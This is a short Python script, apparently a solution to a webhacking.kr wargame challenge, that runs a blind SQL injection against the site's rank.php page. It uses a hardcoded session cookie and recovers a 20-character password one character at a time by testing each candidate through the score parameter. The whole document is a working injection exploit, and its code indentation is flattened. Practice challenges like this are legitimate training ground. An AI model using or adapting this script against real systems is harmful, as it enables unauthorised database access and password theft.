import http.client
import urllib
pwlen=20
def injection(q):
c=http.client.HTTPConnection('webhacking.kr')
head={'Host':'webhacking.kr'}
head['Upgrade-Insecure-Requests']='1'
head['Cookie']='id=rbc; PHPSESSID=98d235f45fb18e9188e6c7d13a5751cc'
c.request('GET','/challenge/web/web-31/rank.php?score=0%20and%20'+urllib.parse.quote(q),headers=head)
#print(c.getresponse().read().decode())
return 'localhost' in c.getresponse().read().decode()
p='1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ?!@#$%^&*()~`[]\\'
ans=''
for i in range(pwlen):
for j in p:
print(j)
if(injection('right(left(pAsSw0RdzzzZ,'+str(i+1)+'),1)='+hex(ord(j)))):
ans+=j
print(ans)
break
print(ans)